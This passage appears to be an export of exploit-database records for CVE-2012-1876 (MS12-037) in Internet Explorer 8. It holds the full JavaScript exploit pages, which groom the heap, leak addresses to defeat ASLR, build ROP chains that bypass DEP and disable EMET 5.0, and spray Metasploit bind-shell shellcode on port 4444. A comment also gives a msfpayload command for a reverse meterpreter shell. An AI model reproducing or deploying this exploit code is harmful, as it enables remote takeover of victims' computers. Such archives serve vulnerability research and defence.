[EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%u38a1%ud25f%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1312272\"; // 0x07D25E40\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/35273.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:28:23", "description": "", "cvss3": {}, "published": "2013-01-10T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1876", "CVE-2012-1876"], "modified": "2013-01-10T00:00:00", "id": "EDB-ID:24017", "href": "https://www.exploit-db.com/exploits/24017", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // Standard DEP bypass\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2); // JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :) also would stay away from meterpreter/reverse_tcp\n // You can also generate as follows: msfpayload windows/meterpreter/reverse_https LHOST=192.168.12.13 LPORT=443 R | msfencode -a x86 -t js_le\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n \"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff\" +\n \"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789\" +\n \"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389\" +\n \"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7\" +\n \"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650\" +\n \"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f\" +\n \"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d\" +\n \"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff\" +\n \"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72\" +\n \"%u006a%uff53%u41d5\");\n\n // Total spray should be 1000\n var padding = unescape(\"%u9090\");\n while (padding.length < 1000)\n padding = padding + padding;\n var padding = padding.substr(0, 1000 - shellcode.length);\n\n shellcode+= padding;\n\n while (shellcode.length < 100000)\n shellcode = shellcode + shellcode;\n\n var onemeg = shellcode.substr(0, 64*1024/2);\n\n for (i=0; i<14; i++) {\n onemeg += shellcode.substr(0, 64*1024/2);\n }\n\n onemeg += shellcode.substr(0, (64*1024/2)-(38/2));\n\n var spray = new Array();\n\n for (i=0; i<100; i++) {\n spray[i] = onemeg.substr(0, onemeg.length);\n }\n}\n\nfunction leak(){\n var leak_col = document.getElementById(\"132\");\n leak_col.width = \"41\";\n leak_col.span = \"19\";\n}\n\nfunction get_leak() {\n var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));\n str_addr = str_addr - 1410704;\n var hex = str_addr.toString(16);\n //alert(hex);\n setTimeout(function(){heapspray(str_addr)}, 50);\n}\n\nfunction trigger_overflow(){\n var evil_col = document.getElementById(\"132\");\n evil_col.width = \"1245880\";\n evil_col.span = \"44\";\n}\n\nsetTimeout(function(){leak()}, 400);\nsetTimeout(function(){get_leak()},450);\nsetTimeout(function(){trigger_overflow()}, 700);\n\n</script>\n</body>\n</html>", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/remote/24017.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-05T15:13:52", "description": "", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "exploitdb", "title": "Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP + EMET 5.0 Bypass) (MS12-037)", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-1876", "CVE-2012-1876"], "modified": "2014-09-29T00:00:00", "id": "EDB-ID:34815", "href": "https://www.exploit-db.com/exploits/34815", "sourceData": "\n\n<html>\n<body>\n<div id=\"evil\"></div>\n<table style=\"table-layout:fixed\" ><col id=\"132\" width=\"41\" span=\"9\" > </col></table>\n<script language='javascript'>\n\nfunction strtoint(str) {\n return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);\n}\n\nvar free = \"EEEE\";\nwhile ( free.length < 500 ) free += free;\n\nvar string1 = \"AAAA\";\nwhile ( string1.length < 500 ) string1 += string1;\n\nvar string2 = \"BBBB\";\nwhile ( string2.length < 500 ) string2 += string2;\n\nvar fr = new Array();\nvar al = new Array();\nvar bl = new Array();\n\nvar div_container = document.getElementById(\"evil\");\ndiv_container.style.cssText = \"display:none\";\n\nfor (var i=0; i < 500; i+=2) {\n fr[i] = free.substring(0, (0x100-6)/2);\n al[i] = string1.substring(0, (0x100-6)/2);\n bl[i] = string2.substring(0, (0x100-6)/2);\n var obj = document.createElement(\"button\");\n div_container.appendChild(obj);\n}\n\nfor (var i=200; i<500; i+=2 ) {\n fr[i] = null;\n CollectGarbage();\n}\n\nfunction heapspray(cbuttonlayout) {\n CollectGarbage();\n var rop = cbuttonlayout + 4161; // RET\n var rop = rop.toString(16);\n var rop1 = rop.substring(4,8);\n var rop2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 11360; // POP EBP\n var rop = rop.toString(16);\n var rop3 = rop.substring(4,8);\n var rop4 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 111675; // XCHG EAX,ESP\n var rop = rop.toString(16);\n var rop5 = rop.substring(4,8);\n var rop6 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12377; // POP EBX\n var rop = rop.toString(16);\n var rop7 = rop.substring(4,8);\n var rop8 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 642768; // POP EDX\n var rop = rop.toString(16);\n var rop9 = rop.substring(4,8);\n var rop10 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12201; // POP ECX --> Changed\n var rop = rop.toString(16);\n var rop11 = rop.substring(4,8);\n var rop12 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5504544; // Writable location\n var rop = rop.toString(16);\n var writable1 = rop.substring(4,8);\n var writable2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12462; // POP EDI\n var rop = rop.toString(16);\n var rop13 = rop.substring(4,8);\n var rop14 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 12043; // POP ESI --> changed\n var rop = rop.toString(16);\n var rop15 = rop.substring(4,8);\n var rop16 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 63776; // JMP EAX\n var rop = rop.toString(16);\n var jmpeax1 = rop.substring(4,8);\n var jmpeax2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 85751; // POP EAX\n var rop = rop.toString(16);\n var rop17 = rop.substring(4,8);\n var rop18 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 4936; // VirtualProtect()\n var rop = rop.toString(16);\n var vp1 = rop.substring(4,8);\n var vp2 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]\n var rop = rop.toString(16);\n var rop19 = rop.substring(4,8);\n var rop20 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 234657; // PUSHAD\n var rop = rop.toString(16);\n var rop21 = rop.substring(4,8);\n var rop22 = rop.substring(0,4); // } RET\n\n\n var rop = cbuttonlayout + 408958; // PUSH ESP\n var rop = rop.toString(16);\n var rop23 = rop.substring(4,8);\n var rop24 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2228408; // POP ECX\n var rop = rop.toString(16);\n var rop25 = rop.substring(4,8);\n var rop26 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1586172; // POP EAX\n var rop = rop.toString(16);\n var rop27 = rop.substring(4,8);\n var rop28 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]\n var rop = rop.toString(16);\n var rop29 = rop.substring(4,8);\n var rop30 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1884912; // PUSH EAX\n var rop = rop.toString(16);\n var rop31 = rop.substring(4,8);\n var rop32 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2140694; // ADD EAX,ECX\n var rop = rop.toString(16);\n var rop33 = rop.substring(4,8);\n var rop34 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX\n var rop = rop.toString(16);\n var rop35 = rop.substring(4,8);\n var rop36 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 5036248; // ADD ESP,0C\n var rop = rop.toString(16);\n var rop37 = rop.substring(4,8);\n var rop38 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX\n var rop = rop.toString(16);\n var rop39 = rop.substring(4,8);\n var rop40 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI\n var rop = rop.toString(16);\n var rop41 = rop.substring(4,8);\n var rop42 = rop.substring(0,4); // } RET\n\n var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX\n var rop = rop.toString(16);\n var rop43 = rop.substring(4,8);\n var rop44 = rop.substring(0,4); // } RET\n\n var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW\n var getmodulew = getmodulew.toString(16);\n var getmodulew1 = getmodulew.substring(4,8);\n var getmodulew2 = getmodulew.substring(0,4); // } RET\n\n\n var shellcode = unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141%u4242%u4242%u4343%u4343\"); // PADDING\n shellcode+= unescape(\"%u4141%u4141\"); // PADDING\n\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RETN\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP # RETN\n shellcode+= unescape(\"%u\"+rop5+\"%u\"+rop6); // XCHG EAX,ESP # RETN\n\n // EMET disable part 0x01\n // Implement the Tachyon detection grid to overcome the Romulan cloaking device.\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u\"+getmodulew1+\"%u\"+getmodulew2); // GetModuleHandleW Ptr\n shellcode+= unescape(\"%u\"+rop29+\"%u\"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u10c4%u076d\"); // EMET_STRING_PTR (GetModuleHandle argument)\n shellcode+= unescape(\"%ua84c%u000a\"); // EMET_CONFIG_STRUCT offset\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u10c0%u076d\"); // MEM_ADDRESS_PTR (Store EMET base address here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u104c%u076d\"); // Get fake DecodePointer argument from the stack and update it with the encoded value\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop27+\"%u\"+rop28); // POP EAX # RETN\n shellcode+= unescape(\"%u10c0%u076d\"); // Get EMET base address Ptr\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u80b0%u0004\"); // Get DecodePointer offset from the stack\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop31+\"%u\"+rop32); // PUSH EAX # RETN\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u9090%u9090\"); // Fake DecodePointer argument (Will be patched)\n shellcode+= unescape(\"%u10bc%u076d\"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)\n shellcode+= unescape(\"%u\"+rop39+\"%u\"+rop40); // MOV DWORD PTR DS:[ESI],EAX\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0558%u0000\"); // ROP Protections offset\n shellcode+= unescape(\"%u\"+rop33+\"%u\"+rop34); // ADD EAX,ECX # RETN\n shellcode+= unescape(\"%u\"+rop25+\"%u\"+rop26); // POP ECX # RETN\n shellcode+= unescape(\"%u0000%u0000\"); // NULL\n shellcode+= unescape(\"%u\"+rop35+\"%u\"+rop36); // MOV DWORD PTR [EAX],ECX # RETN\n // EMET disable part 0x01 end\n\n // Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop3+\"%u\"+rop4); // POP EBP\n shellcode+= unescape(\"%u\"+rop7+\"%u\"+rop8); // POP EBP\n shellcode+= unescape(\"%u1024%u0000\"); // Size 0x00001024\n shellcode+= unescape(\"%u\"+rop9+\"%u\"+rop10); // POP EDX\n shellcode+= unescape(\"%u0040%u0000\"); // 0x00000040\n shellcode+= unescape(\"%u\"+rop11+\"%u\"+rop12); // POP ECX\n shellcode+= unescape(\"%u\"+writable1+\"%u\"+writable2); // Writable Location\n shellcode+= unescape(\"%u\"+rop13+\"%u\"+rop14); // POP EDI\n shellcode+= unescape(\"%u\"+rop1+\"%u\"+rop2); // RET\n shellcode+= unescape(\"%u\"+rop15+\"%u\"+rop16); // POP ESI\n shellcode+= unescape(\"%u\"+jmpeax1+\"%u\"+jmpeax2);// JMP EAX\n shellcode+= unescape(\"%u\"+rop17+\"%u\"+rop18); // POP EAX\n shellcode+= unescape(\"%u\"+vp1+\"%u\"+vp2); // VirtualProtect()\n shellcode+= unescape(\"%u\"+rop19+\"%u\"+rop20); // MOV EAX,DWORD PTR DS:[EAX]\n shellcode+= unescape(\"%u\"+rop21+\"%u\"+rop22); // PUSHAD\n shellcode+= unescape(\"%u\"+rop23+\"%u\"+rop24); // PUSH ESP\n\n // Store various pointers here\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u14eb\"); // NOPs\n shellcode+= unescape(\"%u4242%u4242\"); // Decoded CONFIG structure pointer\n shellcode+= unescape(\"%u4141%u4141\"); // Store BaseAddress address on the *stack*\n shellcode+= \"EMET\"; // EMET string\n shellcode+= unescape(\"%u0000%u0000\"); // EMET string\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // Store various pointers here\n\n // EMET disable part 0x02\n // MOV EAX,DWORD PTR DS:[076D10BCH]\n // MOV ESI,DWORD PTR [EAX+518H]\n // SUB ESP,2CCH\n // MOV DWORD PTR [ESP],10010H\n // MOV EDI,ESP\n // MOV ECX,2CCH\n // ADD EDI,4\n // SUB ECX,4\n // XOR EAX,EAX\n // REP STOS BYTE PTR ES:[EDI]\n // PUSH ESP\n // PUSH 0FFFFFFFEH\n // CALL ESI\n shellcode+= unescape(\"%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec\" +\n \"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9\" +\n \"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa\" +\n \"%ufe6a%ud6ff\");\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n shellcode+= unescape(\"%u9090%u9090\"); // NOPs\n // EMET disable part 0x02 end\n\n // Bind shellcode on 4444 :)\n // msf > generate -t js_le\n // windows/shell_bind_tcp - 342 bytes\n // http://www.metasploit.com\n // VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,\n // EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=\n // I would keep the shellcode the same size for better reliability :)\n\n shellcode+= unescape(\"%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b\" +\n \"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a\" +\n \"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf\" +\n \"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001\" +\n \"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18\" +\n \"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31\" +\n \"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03\" +\n \"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66\" +\n \"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489\" +\n \"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a\" +\n \"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32\" +\n \"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900\" +\n \"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050\" +\n \"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7\" +\n \"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857\" +\n 